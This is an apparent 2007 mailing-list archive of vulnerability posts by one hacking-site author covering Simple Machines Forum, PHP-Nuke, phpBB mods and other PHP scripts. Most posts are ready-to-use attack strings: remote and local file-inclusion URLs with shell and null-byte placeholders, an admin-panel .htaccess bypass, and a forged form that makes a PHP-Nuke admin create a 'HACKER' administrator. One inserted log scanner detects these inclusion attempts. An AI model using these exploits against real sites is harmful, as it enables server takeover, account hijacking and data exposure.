Simple Machine Forum - Private section/posts/info disclosure

2007-11-08 Thread h3llcode
# Vulnerable: Simple Machine Forum [ALL Versions] 

#

# Tested on SMF 1.1.4

#

# Type: Private Section,Posts,Information disclosure.

#

# Risk: Low / Medium

#

# Discovered By Seph1roth

#

# Site: http://www.blackroots.it -> The Best Hacking site. (eng / ita)

#

# Explanation:

#

# If some section is restricted only to staff, VIPs or private groups/members, this bug can be used to read the entire section and its messages, without privileges.

#

# Example:

#

# In my forum I have a Staff area, and in it there is a message that contains "Bug", "exploit" or some other keywords... I put these keywords in the advanced search module, and I select "show results as messages"... and tadaaa... my priv8 zone can be read by everyone...

#

# Greetz to all BlackRoots users!

#

# Shoutz to all kiddies!


SMF .htaccess bypass

2007-11-06 Thread h3llcode
# ./start

#

# Discovered by Seph1roth in June 2007 (was priv8)

#

# Vulnerable: Simple Machine Forum [ALL Versions]

#

# Visit: http://www.blackroots.it - Best hacking site.

#

# Description:


If SMF has index.php?action=admin in .htaccess, I can bypass that by typing in the URL some variable of the administration panel:


example:


index.php?action=admin (.htaccess,then access denied)

index.php?action=membergroups (accessible)

index.php?action=news (accessible)

index.php?action=featuresettings (accessible)


...and others...


I can bypass and enter the administration by typing the accessible variables in the URL...


# Greets to all BlackRoots Users

#

# Shoutz to all kiddies

#

# ./end


phpBB Mod OpenID 0.2.0 BBStore.php Remote File Inclusion

2007-10-01 Thread h3llcode
+++
+
+ phpBB Mod OpenID 0.2.0 BBStore.php RFI
+ Risk: High
+ Found by Seph1roth
+ Site: http://blackroots.it
+
+++

+ Vulnerable Script Download: 
http://sourceforge.net/project/showfiles.php?group_id=178846

+ Exploit:
http://www.victim.it/path/includes/openid/Auth/OpenID/BBStore.php?openid_root_path=[Shell]


sk.log v0.5.3 Remote File Inclusion

2007-09-24 Thread h3llcode
++
+ sk.log v0.5.3 Remote File Inclusion
+ High Risk
+ Found by Seph1roth
+ http://blackroots.it
++

+ Vulnerable Code

+ log.inc.php
+ include_once( "$SKIN_URL/php/logdisplay.inc.php" );

+ Exploit
/php-inc/log.inc.php?SKIN_URL=[Shell]

+ Script Download
http://surfnet.dl.sourceforge.net/sourceforge/sklog/sk.log_v0.5.3.zip


Nuke Mobile Entertainment Local File Inclusion

2007-09-24 Thread h3llcode
---
# Found by Seph1roth
# http://blackroots.it
---

# Vulnerable script download
http://www.suonerie-polifoniche-gratis.net/mobilentertainment.zip


# Bug : http://VICTIM/[path]/data/compatible.php?module_name=[Local File]%00


# This is the vulnerable code :

# include 'modules/'.$module_name.'compatibility/data/marque.data.php';


Re: Re: PHP-Nuke add admin ALL Versions

2007-09-21 Thread h3llcode
Yeah, all versions of phpnuke are vulnerable...

Regards.

Seph1roth


Neuron News 1.0 Local file inclusion (index.php)

2007-09-21 Thread h3llcode
+++

Neuron News 1.0 Local File inclusion

+++

# Found by Seph1roth
# http://blackroots.it

#Vulnerable Script Download:  
http://downloads.localhost.be/scripts/neuronnews.zip

# Bug :

http://[TARGET]/[PATH]/index.php?q=[Local File]%00

# Risk: The attacker can include sensitive local files.



PHP-Nuke add admin ALL Versions

2007-09-20 Thread h3llcode
Paste this code into an HTML page then link it to victim (victim must be admin)


http://VICTIMURL/nuke/admin.php"; 
target="aiuto" METHOD=POST>









document.Faiuto.submit() 

You are admin now ;)

Then you can log into phpnuke with user HACKER and pass YOURPASSWORD...


WebED-0.8999 Multiple Remote File Inclusion Vulnerability

2007-09-20 Thread h3llcode
---

Multiple Remote File Inclusion Vulnerability

---

# Found by: Seph1roth

# Download Script: http://sourceforge.net/projects/ed-engine/ 
WebED-0.8999.tar.gz

# Exploit:

# http://[target]/[path]/source/mod/rss/channeledit.php?Codebase=[Shell]

# http://[target]/[path]/source/mod/rss/post.php?Codebase=[Shell]

# http://[target]/[path]/source/mod/rss/view.php?Codebase=[Shell]

# http://[target]/[path]/source/mod/rss/viewitem.php?Codebase=[Shell]

---
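
A detection sketch for the file-inclusion reports above (phpBB Mod OpenID, sk.log, Nuke Mobile Entertainment, Neuron News, WebED), added here as an example and not part of any of the original posts: it scans web-server access-log lines for the parameter names those advisories list and flags values that carry a remote URL, a decoded null byte, or directory traversal. The combined log format, the sample lines, the addresses and the function names are assumptions constructed for illustration.

```python
from urllib.parse import parse_qsl, urlsplit

# Parameter names taken from the advisories on this page (PHP names are case-sensitive).
INCLUDE_PARAMS = {"openid_root_path", "SKIN_URL", "Codebase", "module_name", "q"}
# Value prefixes that make PHP's include() fetch from outside the local tree.
REMOTE_PREFIXES = ("http://", "https://", "ftp://", "php://", "data:")


def classify_request(target):
    """Return a list of (param, finding) tuples for one request target."""
    findings = []
    query = urlsplit(target).query
    # parse_qsl percent-decodes values, so %00 arrives here as "\x00".
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name not in INCLUDE_PARAMS:
            continue
        if value.lower().startswith(REMOTE_PREFIXES):
            findings.append((name, "remote-include"))
        if "\x00" in value:
            findings.append((name, "null-byte"))
        if "../" in value or "..\\" in value:
            findings.append((name, "path-traversal"))
    return findings


def scan_access_log(lines):
    """Return (client, target, findings) for each flagged log line."""
    hits = []
    for line in lines:
        try:
            client = line.split(" ", 1)[0]
            request = line.split('"')[1]   # e.g. GET /x.php?a=b HTTP/1.1
            target = request.split(" ")[1]
        except IndexError:
            continue  # malformed line: skip it rather than abort the scan
        findings = classify_request(target)
        if findings:
            hits.append((client, target, findings))
    return hits


# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [24/Sep/2007:10:00:01 +0000] "GET /php-inc/log.inc.php?SKIN_URL=http://example.invalid/x HTTP/1.1" 200 512',
    '192.0.2.11 - - [24/Sep/2007:10:00:05 +0000] "GET /index.php?q=../../local.file%00 HTTP/1.1" 200 1024',
    '192.0.2.12 - - [24/Sep/2007:10:00:09 +0000] "GET /index.php?q=latest-news HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, target, findings in scan_access_log(SAMPLE_LOG):
        print(client, target, findings)
```

A short name such as `q` is also used by ordinary search pages, so hits on it are worth triaging by finding type rather than by parameter name alone.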


PhpBB Xs 2 profile.php Permanent Xss Vulnerability

2007-09-20 Thread h3llcode
+++

PhpBB Xs 2 profile.php Permanent Xss Vulnerability

+++

#Found By Seph1roth

+++

[POST METHOD]

Corrupted page: profile.php?mode=editprofile&cpl_mode=profile_info

Bugged Variable: "selfdes" ("Other information" field)

Xss: [XSS STRING]